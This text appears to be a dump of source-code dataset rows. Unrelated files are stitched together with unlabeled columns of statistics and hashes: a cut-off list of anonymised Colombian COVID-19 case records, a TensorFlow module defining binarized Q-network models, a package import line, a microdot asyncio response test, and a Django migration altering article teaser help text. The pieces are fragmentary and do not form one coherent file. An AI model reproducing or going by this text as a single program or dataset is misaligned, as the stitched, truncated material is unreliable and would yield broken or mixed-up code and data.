'sourceEntryId': '13',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'NEIVA, HUILA, Colombia',
'geometry': {'latitude': 2.99336002479853, 'longitude': -75.272362338162},
'administrativeAreaLevel1': 'HUILA',
'administrativeAreaLevel2': 'NEIVA'},
'demographics': {'ageRange': {'start': 68.0, 'end': 68.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/12/2020Z', 'end': '03/12/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/06/2020Z', 'end': '03/06/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/30/2020Z', 'end': '03/30/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'notes': 'Patient self-isolated and recovered at home., Case was transmitted within Colombia., Symptom severity was Mild, Date reported online was 03/12/2020., Date reported to SIVIGILA was 03/10/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '14',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'PALMIRA, VALLE DEL CAUCA, Colombia',
'geometry': {'latitude': 3.5583916329393, 'longitude': -76.2278025103617},
'administrativeAreaLevel1': 'VALLE DEL CAUCA',
'administrativeAreaLevel2': 'PALMIRA'},
'demographics': {'ageRange': {'start': 48.0, 'end': 48.0},
'gender': 'Male',
'ethnicity': 'Black'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/13/2020Z', 'end': '03/13/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/07/2020Z', 'end': '03/07/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/21/2020Z', 'end': '03/21/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'ES',
'geoResolution': 'Country',
'name': 'Spain',
'geometry': {'latitude': 40.463667, 'longitude': -3.74922}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ESPAÑA., Symptom severity was Mild, Date reported online was 03/13/2020., Date reported to SIVIGILA was 03/10/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '15',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'VILLAVICENCIO, META, Colombia',
'geometry': {'latitude': 4.09166560580672, 'longitude': -73.4929036676635},
'administrativeAreaLevel1': 'META',
'administrativeAreaLevel2': 'VILLAVICENCIO'},
'demographics': {'ageRange': {'start': 30.0, 'end': 30.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/13/2020Z', 'end': '03/13/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/09/2020Z', 'end': '03/09/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/23/2020Z', 'end': '03/23/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'ES',
'geoResolution': 'Country',
'name': 'Spain',
'geometry': {'latitude': 40.463667, 'longitude': -3.74922}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ESPAÑA., Symptom severity was Mild, Date reported online was 03/13/2020., Date reported to SIVIGILA was 03/13/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '16',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'BOGOTÁ, D.C., BOGOTÁ, D.C., Colombia',
'geometry': {'latitude': 4.31610770770964, 'longitude': -74.1810727121648},
'administrativeAreaLevel1': 'BOGOTÁ, D.C.',
'administrativeAreaLevel2': 'BOGOTÁ, D.C.'},
'demographics': {'ageRange': {'start': 61.0, 'end': 61.0},
'gender': 'Female',
'ethnicity': 'Black'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/13/2020Z', 'end': '03/13/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/08/2020Z', 'end': '03/08/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/23/2020Z', 'end': '03/23/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'IT',
'geoResolution': 'Country',
'name': 'Italy',
'geometry': {'latitude': 41.87194, 'longitude': 12.56738}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ITALIA., Symptom severity was Mild, Date reported online was 03/13/2020., Date reported to SIVIGILA was 03/11/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '17',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'BOGOTÁ, D.C., BOGOTÁ, D.C., Colombia',
'geometry': {'latitude': 4.31610770770964, 'longitude': -74.1810727121648},
'administrativeAreaLevel1': 'BOGOTÁ, D.C.',
'administrativeAreaLevel2': 'BOGOTÁ, D.C.'},
'demographics': {'ageRange': {'start': 73.0, 'end': 73.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/14/2020Z', 'end': '03/14/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '02/28/2020Z', 'end': '02/28/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/14/2020Z', 'end': '03/14/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'ES',
'geoResolution': 'Country',
'name': 'Spain',
'geometry': {'latitude': 40.463667, 'longitude': -3.74922}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ESPAÑA., Symptom severity was Mild, Date reported online was 03/14/2020., Date reported to SIVIGILA was 03/11/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '18',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'BOGOTÁ, D.C., BOGOTÁ, D.C., Colombia',
'geometry': {'latitude': 4.31610770770964, 'longitude': -74.1810727121648},
'administrativeAreaLevel1': 'BOGOTÁ, D.C.',
'administrativeAreaLevel2': 'BOGOTÁ, D.C.'},
'demographics': {'ageRange': {'start': 54.0, 'end': 54.0},
'gender': 'Male',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/14/2020Z', 'end': '03/14/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/07/2020Z', 'end': '03/07/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '04/07/2020Z', 'end': '04/07/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'ES',
'geoResolution': 'Country',
'name': 'Spain',
'geometry': {'latitude': 40.463667, 'longitude': -3.74922}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ESPAÑA., Symptom severity was Mild, Date reported online was 03/14/2020., Date reported to SIVIGILA was 03/11/2020., Patient recovery was confirmed by 21 days elapsing with no symptoms.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '19',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'BOGOTÁ, D.C., BOGOTÁ, D.C., Colombia',
'geometry': {'latitude': 4.31610770770964, 'longitude': -74.1810727121648},
'administrativeAreaLevel1': 'BOGOTÁ, D.C.',
'administrativeAreaLevel2': 'BOGOTÁ, D.C.'},
'demographics': {'ageRange': {'start': 54.0, 'end': 54.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/14/2020Z', 'end': '03/14/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/09/2020Z', 'end': '03/09/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/24/2020Z', 'end': '03/24/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'notes': 'Patient self-isolated and recovered at home., Case was transmitted within Colombia., Symptom severity was Mild, Date reported online was 03/14/2020., Date reported to SIVIGILA was 03/12/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '20',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'MEDELLÍN, ANTIOQUIA, Colombia',
'geometry': {'latitude': 6.25759027927781, 'longitude': -75.6110318154478},
'administrativeAreaLevel1': 'ANTIOQUIA',
'administrativeAreaLevel2': 'MEDELLÍN'},
'demographics': {'ageRange': {'start': 26.0, 'end': 26.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/14/2020Z', 'end': '03/14/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/09/2020Z', 'end': '03/09/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/24/2020Z', 'end': '03/24/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'notes': 'Patient self-isolated and recovered at home., Case was transmitted within Colombia., Symptom severity was Mild, Date reported online was 03/14/2020., Date reported to SIVIGILA was 03/11/2020., Patient recovery was confirmed by a negative PCR test.'}])
| 77.392996
| 348
| 0.430166
| 2,970
| 39,780
| 5.740404
| 0.074074
| 0.04927
| 0.051616
| 0.039885
| 0.912018
| 0.897355
| 0.895302
| 0.889026
| 0.877178
| 0.853422
| 0
| 0.101523
| 0.42554
| 39,780
| 513
| 349
| 77.54386
| 0.644539
| 0.001257
| 0
| 0.790099
| 0
| 0.039604
| 0.438372
| 0.024178
| 0
| 0
| 0
| 0
| 0.00198
| 1
| 0.00396
| false
| 0
| 0.033663
| 0
| 0.039604
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c48f84f05699905b5d78af621455f8f0bf3d6074
| 12,854
|
py
|
Python
|
model.py
|
Leonardo-H/Energy-Efficient-RL
|
df5845bedcce16593c46724e88161f172c88e27b
|
[
"Apache-2.0"
] | null | null | null |
model.py
|
Leonardo-H/Energy-Efficient-RL
|
df5845bedcce16593c46724e88161f172c88e27b
|
[
"Apache-2.0"
] | null | null | null |
model.py
|
Leonardo-H/Energy-Efficient-RL
|
df5845bedcce16593c46724e88161f172c88e27b
|
[
"Apache-2.0"
] | null | null | null |
import tensorflow as tf
import tensorflow.contrib.layers as layers
import numpy
def BatchNorm(x, is_training=None):
assert is_training is not None
return tf.contrib.layers.batch_norm(x, decay=0.9, center=True, scale=True,
updates_collections=None, is_training=is_training, trainable=True, fused=True)
def binarize(x):
"""
Clip and binarize tensor using the straight through estimator (STE) for the gradient.
"""
ret = x + tf.stop_gradient(tf.sign(x) - x)
return ret
def BinarizedAffine(x, nOutputPlane, name=None, reuse=False, is_training=True, use_sign=False):
with tf.variable_scope(name,'Affine',[x], reuse=reuse):
'''
Note that we use binarized version of the input (bin_x) and the weights (bin_w). Since the binarized function uses STE
we calculate the gradients using bin_x and bin_w but we update w (the full precition version).
'''
if use_sign:
print('use sign in Affine')
bin_x = tf.sign(x)
else:
bin_x = binarize(x)
nInputPlane = bin_x.get_shape().as_list()[1]
w = tf.get_variable('weight', [nInputPlane, nOutputPlane], initializer=tf.contrib.layers.xavier_initializer())
if use_sign:
print('use sign in Affine')
bin_w = tf.sign(w)
else:
bin_w = binarize(w)
output = tf.matmul(bin_x, bin_w)
return output
def BinarizedSpatialConvolution(x, nOutputPlane, kW, kH, dW=1, dH=1,
padding='SAME', reuse=False, name='BinarizedSpatialConvolution', is_training=True, use_sign=False):
nInputPlane = x.get_shape().as_list()[3]
with tf.variable_scope(name, None,[x], reuse=reuse):
w = tf.get_variable('weight', [kH, kW, nInputPlane, nOutputPlane], initializer=tf.contrib.layers.xavier_initializer_conv2d())
if use_sign:
print('use sign in Conv')
bin_w = tf.sign(w)
bin_x = tf.sign(x)
else:
bin_w = binarize(w)
bin_x = binarize(x)
'''
Note that we use binarized version of the input and the weights. Since the binarized function uses STE
we calculate the gradients using bin_x and bin_w but we update w (the full precition version).
'''
out = tf.nn.conv2d(bin_x, bin_w, strides=[1, dH, dW, 1], padding=padding)
return out
def BinarizedWeightOnlySpatialConvolution(x, nOutputPlane, kW, kH, dW=1, dH=1, is_training=True,
padding='SAME', reuse=False, name='BinarizedWeightOnlySpatialConvolution', use_sign=False):
'''
This function is used only at the first layer of the model as we dont want to binarized the RGB images
'''
nInputPlane = x.get_shape().as_list()[3]
with tf.variable_scope(name, None, [x], reuse=reuse):
w = tf.get_variable('weight', [kH, kW, nInputPlane, nOutputPlane],
initializer=tf.contrib.layers.xavier_initializer_conv2d())
if use_sign:
print('use sign in first conv')
bin_w = tf.sign(w)
else:
bin_w = binarize(w)
out = tf.nn.conv2d(x, bin_w, strides=[1, dH, dW, 1], padding=padding)
return out
def HardTanh(x):
return tf.clip_by_value(x, -1, 1)
def v_func_model(img_in, scope, reuse=False, batch_norm=False):
with tf.variable_scope(scope, reuse=reuse):
out = img_in
with tf.variable_scope("convnet"):
out = layers.convolution2d(out, num_outputs=32, kernel_size=8, stride=4, activation_fn=tf.nn.relu)
out = layers.convolution2d(out, num_outputs=64, kernel_size=4, stride=2, activation_fn=tf.nn.relu)
out = layers.convolution2d(out, num_outputs=64, kernel_size=3, stride=1, activation_fn=tf.nn.relu)
out = layers.flatten(out)
with tf.variable_scope("state_value"):
out = layers.fully_connected(out, num_outputs=512, activation_fn=tf.nn.relu)
out = layers.fully_connected(out, num_outputs=1, activation_fn=None)
return out
# binary model used for bootstrapping algorithm
def binary_model_1(img_in, num_actions, scope, is_training, reuse=False, use_sign=False):
with tf.variable_scope(scope, reuse=reuse):
out = img_in
with tf.variable_scope("convnet"):
out = BinarizedWeightOnlySpatialConvolution(
x=out,
nOutputPlane=32,
kW=8,
kH=8,
dW=4,
dH=4,
name='BWOSC_0',
use_sign=use_sign,
)
out = BatchNorm(out, is_training)
out = HardTanh(out)
out = BinarizedSpatialConvolution(
x=out,
nOutputPlane=64,
kW=4,
kH=4,
dW=2,
dH=2,
name='BSC_0',
use_sign=use_sign,
)
out = BatchNorm(out, is_training)
out = HardTanh(out)
out = BinarizedSpatialConvolution(
x=out,
nOutputPlane=64,
kW=3,
kH=3,
dW=1,
dH=1,
name='BSC_1',
use_sign=use_sign,
)
out = BatchNorm(out, is_training)
out = HardTanh(out)
out = layers.flatten(out)
with tf.variable_scope("action_value"):
actions_hidden = BinarizedAffine(out, nOutputPlane=512, use_sign=use_sign)
actions_hidden = BatchNorm(actions_hidden, is_training)
actions_hidden = HardTanh(actions_hidden)
action_scores = BinarizedAffine(actions_hidden, nOutputPlane=num_actions, use_sign=use_sign)
action_scores = BatchNorm(action_scores, is_training)
action_scores_mean = tf.reduce_mean(action_scores, 1)
action_scores = action_scores - tf.expand_dims(action_scores_mean, 1)
return action_scores
# binary model used for imitation learning algorithm
def binary_model_2(img_in, num_actions, scope, is_training, reuse=False, use_sign=False):
with tf.variable_scope(scope, reuse=reuse):
out = img_in
with tf.variable_scope("convnet"):
out = BinarizedWeightOnlySpatialConvolution(
x=out,
nOutputPlane=32,
kW=8,
kH=8,
dW=4,
dH=4,
name='BWOSC_0',
use_sign=use_sign,
)
out = BatchNorm(out, is_training)
out = HardTanh(out)
out = BinarizedSpatialConvolution(
x=out,
nOutputPlane=64,
kW=4,
kH=4,
dW=2,
dH=2,
name='BSC_0',
use_sign=use_sign,
)
out = BatchNorm(out, is_training)
out = HardTanh(out)
out = BinarizedSpatialConvolution(
x=out,
nOutputPlane=64,
kW=3,
kH=3,
dW=1,
dH=1,
name='BSC_1',
use_sign=use_sign,
)
out = BatchNorm(out, is_training)
out = HardTanh(out)
out = layers.flatten(out)
with tf.variable_scope("action_value"):
actions_hidden = BinarizedAffine(out, nOutputPlane=512, use_sign=use_sign)
actions_hidden = BatchNorm(actions_hidden, is_training)
actions_hidden = HardTanh(actions_hidden)
action_scores = BinarizedAffine(actions_hidden, nOutputPlane=num_actions, use_sign=use_sign)
action_scores = BatchNorm(action_scores, is_training)
return action_scores
# binary model used for bootstrapping algorithm
def binary_model_3(img_in, num_actions, scope, is_training, reuse=False, ):
with tf.variable_scope(scope, reuse=reuse):
out = img_in
with tf.variable_scope("convnet"):
out = BinarizedWeightOnlySpatialConvolution(
x=out,
nOutputPlane=32,
kW=8,
kH=8,
dW=4,
dH=4,
name='BWOSC_0',
)
out = BatchNorm(out, is_training)
out = HardTanh(out)
out = BinarizedSpatialConvolution(
x=out,
nOutputPlane=64,
kW=4,
kH=4,
dW=2,
dH=2,
name='BSC_0'
)
out = BatchNorm(out, is_training)
out = HardTanh(out)
out = BinarizedSpatialConvolution(
x=out,
nOutputPlane=64,
kW=3,
kH=3,
dW=1,
dH=1,
name='BSC_1'
)
out = BatchNorm(out, is_training)
out = HardTanh(out)
out = layers.flatten(out)
with tf.variable_scope("action_value"):
actions_hidden = BinarizedAffine(out, nOutputPlane=512)
actions_hidden = BatchNorm(actions_hidden, is_training)
actions_hidden = HardTanh(actions_hidden)
action_scores = BinarizedAffine(actions_hidden, nOutputPlane=num_actions)
action_scores = BatchNorm(action_scores, is_training)
action_scores_mean = tf.reduce_mean(action_scores, 1)
action_scores = action_scores - tf.expand_dims(action_scores_mean, 1)
return action_scores
# binary model used for imitation learning algorithm
def binary_model_4(img_in, num_actions, scope, is_training, reuse=False,):
with tf.variable_scope(scope, reuse=reuse):
out = img_in
with tf.variable_scope("convnet"):
out = BinarizedWeightOnlySpatialConvolution(
x=out,
nOutputPlane=32,
kW=8,
kH=8,
dW=4,
dH=4,
name='BWOSC_0',
)
out = BatchNorm(out, is_training)
out = HardTanh(out)
out = BinarizedSpatialConvolution(
x=out,
nOutputPlane=64,
kW=4,
kH=4,
dW=2,
dH=2,
name='BSC_0'
)
out = BatchNorm(out, is_training)
out = HardTanh(out)
out = BinarizedSpatialConvolution(
x=out,
nOutputPlane=64,
kW=3,
kH=3,
dW=1,
dH=1,
name='BSC_1'
)
out = BatchNorm(out, is_training)
out = HardTanh(out)
out = layers.flatten(out)
with tf.variable_scope("action_value"):
actions_hidden = BinarizedAffine(out, nOutputPlane=512)
actions_hidden = BatchNorm(actions_hidden, is_training)
actions_hidden = HardTanh(actions_hidden)
action_scores = BinarizedAffine(actions_hidden, nOutputPlane=num_actions)
action_scores = BatchNorm(action_scores, is_training)
return action_scores
| 40.806349
| 134
| 0.490898
| 1,282
| 12,854
| 4.736349
| 0.119345
| 0.038043
| 0.041502
| 0.056324
| 0.842721
| 0.826416
| 0.81143
| 0.782444
| 0.75774
| 0.717062
| 0
| 0.019388
| 0.430216
| 12,854
| 314
| 135
| 40.936306
| 0.809667
| 0.029796
| 0
| 0.797665
| 0
| 0
| 0.0285
| 0.005494
| 0
| 0
| 0
| 0
| 0.003891
| 1
| 0.042802
| false
| 0
| 0.011673
| 0.003891
| 0.097276
| 0.015564
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4fe565446518aeb58a65768edde3e7343df3e6b
| 55
|
py
|
Python
|
flu_ani_analysis/__init__.py
|
woxueqinglong/Fluorescence-Anisotropy-Analysis
|
e6ea9483da025f4e1457a640a6ce678769776fca
|
[
"MIT"
] | null | null | null |
flu_ani_analysis/__init__.py
|
woxueqinglong/Fluorescence-Anisotropy-Analysis
|
e6ea9483da025f4e1457a640a6ce678769776fca
|
[
"MIT"
] | null | null | null |
flu_ani_analysis/__init__.py
|
woxueqinglong/Fluorescence-Anisotropy-Analysis
|
e6ea9483da025f4e1457a640a6ce678769776fca
|
[
"MIT"
] | null | null | null |
from flu_ani_analysis.flu_ani_analysis_module import FA
| 55
| 55
| 0.927273
| 10
| 55
| 4.6
| 0.7
| 0.26087
| 0.608696
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054545
| 55
| 1
| 55
| 55
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1effba6a8513716da0518890aa868b96f6706bfa
| 3,594
|
py
|
Python
|
tests/microdot_asyncio/test_response_asyncio.py
|
cmpadden/microdot
|
a5a14ff9f327925108303cf0d7f7f69d9b36d1b1
|
[
"MIT"
] | 3
|
2021-01-31T22:14:34.000Z
|
2021-08-21T23:28:51.000Z
|
tests/microdot_asyncio/test_response_asyncio.py
|
dpgeorge/microdot
|
dfbe2edd797153fc9be40bc1928d93bdee7e7be5
|
[
"MIT"
] | null | null | null |
tests/microdot_asyncio/test_response_asyncio.py
|
dpgeorge/microdot
|
dfbe2edd797153fc9be40bc1928d93bdee7e7be5
|
[
"MIT"
] | null | null | null |
try:
import uasyncio as asyncio
except ImportError:
import asyncio
import unittest
from microdot_asyncio import Response
from tests.mock_socket import FakeStreamAsync
def _run(coro):
return asyncio.get_event_loop().run_until_complete(coro)
class TestResponseAsync(unittest.TestCase):
def test_create_from_string(self):
res = Response('foo')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.headers, {})
self.assertEqual(res.body, b'foo')
fd = FakeStreamAsync()
_run(res.write(fd))
self.assertIn(b'HTTP/1.0 200 OK\r\n', fd.response)
self.assertIn(b'Content-Length: 3\r\n', fd.response)
self.assertIn(b'Content-Type: text/plain\r\n', fd.response)
self.assertTrue(fd.response.endswith(b'\r\n\r\nfoo'))
def test_create_from_string_with_content_length(self):
res = Response('foo', headers={'Content-Length': '2'})
self.assertEqual(res.status_code, 200)
self.assertEqual(res.headers, {'Content-Length': '2'})
self.assertEqual(res.body, b'foo')
fd = FakeStreamAsync()
_run(res.write(fd))
self.assertIn(b'HTTP/1.0 200 OK\r\n', fd.response)
self.assertIn(b'Content-Length: 2\r\n', fd.response)
self.assertIn(b'Content-Type: text/plain\r\n', fd.response)
self.assertTrue(fd.response.endswith(b'\r\n\r\nfoo'))
def test_create_from_bytes(self):
res = Response(b'foo')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.headers, {})
self.assertEqual(res.body, b'foo')
fd = FakeStreamAsync()
_run(res.write(fd))
self.assertIn(b'HTTP/1.0 200 OK\r\n', fd.response)
self.assertIn(b'Content-Length: 3\r\n', fd.response)
self.assertIn(b'Content-Type: text/plain\r\n', fd.response)
self.assertTrue(fd.response.endswith(b'\r\n\r\nfoo'))
def test_create_empty(self):
res = Response(headers={'X-Foo': 'Bar'})
self.assertEqual(res.status_code, 200)
self.assertEqual(res.headers, {'X-Foo': 'Bar'})
self.assertEqual(res.body, b'')
fd = FakeStreamAsync()
_run(res.write(fd))
self.assertIn(b'HTTP/1.0 200 OK\r\n', fd.response)
self.assertIn(b'X-Foo: Bar\r\n', fd.response)
self.assertIn(b'Content-Length: 0\r\n', fd.response)
self.assertIn(b'Content-Type: text/plain\r\n', fd.response)
self.assertTrue(fd.response.endswith(b'\r\n\r\n'))
def test_create_json(self):
res = Response({'foo': 'bar'})
self.assertEqual(res.status_code, 200)
self.assertEqual(res.headers, {'Content-Type': 'application/json'})
self.assertEqual(res.body, b'{"foo": "bar"}')
fd = FakeStreamAsync()
_run(res.write(fd))
self.assertIn(b'HTTP/1.0 200 OK\r\n', fd.response)
self.assertIn(b'Content-Length: 14\r\n', fd.response)
self.assertIn(b'Content-Type: application/json\r\n', fd.response)
self.assertTrue(fd.response.endswith(b'\r\n\r\n{"foo": "bar"}'))
res = Response([1, '2'])
self.assertEqual(res.status_code, 200)
self.assertEqual(res.headers, {'Content-Type': 'application/json'})
self.assertEqual(res.body, b'[1, "2"]')
fd = FakeStreamAsync()
_run(res.write(fd))
self.assertIn(b'HTTP/1.0 200 OK\r\n', fd.response)
self.assertIn(b'Content-Length: 8\r\n', fd.response)
self.assertIn(b'Content-Type: application/json\r\n', fd.response)
self.assertTrue(fd.response.endswith(b'\r\n\r\n[1, "2"]'))
| 41.310345
| 75
| 0.633834
| 516
| 3,594
| 4.346899
| 0.131783
| 0.024967
| 0.11012
| 0.10165
| 0.823451
| 0.808292
| 0.806955
| 0.780205
| 0.780205
| 0.763263
| 0
| 0.021959
| 0.201725
| 3,594
| 86
| 76
| 41.790698
| 0.759847
| 0
| 0
| 0.552632
| 0
| 0
| 0.184474
| 0
| 0
| 0
| 0
| 0
| 0.565789
| 1
| 0.078947
| false
| 0
| 0.078947
| 0.013158
| 0.184211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48055ce4d22807f56e116ff7ffd2fd433c272b0e
| 2,832
|
py
|
Python
|
great_international/migrations/0067_auto_20190814_0940.py
|
uktrade/directory-cms
|
8c8d13ce29ea74ddce7a40f3dd29c8847145d549
|
[
"MIT"
] | 6
|
2018-03-20T11:19:07.000Z
|
2021-10-05T07:53:11.000Z
|
great_international/migrations/0067_auto_20190814_0940.py
|
uktrade/directory-cms
|
8c8d13ce29ea74ddce7a40f3dd29c8847145d549
|
[
"MIT"
] | 802
|
2018-02-05T14:16:13.000Z
|
2022-02-10T10:59:21.000Z
|
great_international/migrations/0067_auto_20190814_0940.py
|
uktrade/directory-cms
|
8c8d13ce29ea74ddce7a40f3dd29c8847145d549
|
[
"MIT"
] | 6
|
2019-01-22T13:19:37.000Z
|
2019-07-01T10:35:26.000Z
|
# Generated by Django 2.2.3 on 2019-08-14 09:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('great_international', '0066_capitalinvestcontactformpage_capitalinvestcontactformsuccesspage'),
]
operations = [
migrations.AlterField(
model_name='internationalarticlepage',
name='article_teaser',
field=models.TextField(blank=True, help_text='This is a subheading that displays when the article is featured on another page'),
),
migrations.AlterField(
model_name='internationalarticlepage',
name='article_teaser_ar',
field=models.TextField(blank=True, help_text='This is a subheading that displays when the article is featured on another page', null=True),
),
migrations.AlterField(
model_name='internationalarticlepage',
name='article_teaser_de',
field=models.TextField(blank=True, help_text='This is a subheading that displays when the article is featured on another page', null=True),
),
migrations.AlterField(
model_name='internationalarticlepage',
name='article_teaser_en_gb',
field=models.TextField(blank=True, help_text='This is a subheading that displays when the article is featured on another page', null=True),
),
migrations.AlterField(
model_name='internationalarticlepage',
name='article_teaser_es',
field=models.TextField(blank=True, help_text='This is a subheading that displays when the article is featured on another page', null=True),
),
migrations.AlterField(
model_name='internationalarticlepage',
name='article_teaser_fr',
field=models.TextField(blank=True, help_text='This is a subheading that displays when the article is featured on another page', null=True),
),
migrations.AlterField(
model_name='internationalarticlepage',
name='article_teaser_ja',
field=models.TextField(blank=True, help_text='This is a subheading that displays when the article is featured on another page', null=True),
),
migrations.AlterField(
model_name='internationalarticlepage',
name='article_teaser_pt',
field=models.TextField(blank=True, help_text='This is a subheading that displays when the article is featured on another page', null=True),
),
migrations.AlterField(
model_name='internationalarticlepage',
name='article_teaser_zh_hans',
field=models.TextField(blank=True, help_text='This is a subheading that displays when the article is featured on another page', null=True),
),
]
| 48
| 151
| 0.667726
| 316
| 2,832
| 5.857595
| 0.186709
| 0.097245
| 0.121556
| 0.141005
| 0.875743
| 0.875743
| 0.875743
| 0.875743
| 0.800108
| 0.800108
| 0
| 0.008916
| 0.247528
| 2,832
| 58
| 152
| 48.827586
| 0.85969
| 0.01589
| 0
| 0.673077
| 1
| 0
| 0.421185
| 0.110233
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019231
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
487e48f9e2cc2371626b5094855d680f25f9fec0
| 3,348
|
py
|
Python
|
api/tests/test_student_upload.py
|
matchd-ch/matchd-backend
|
84be4aab1b4708cae50a8988301b15df877c8db0
|
[
"Apache-2.0"
] | 1
|
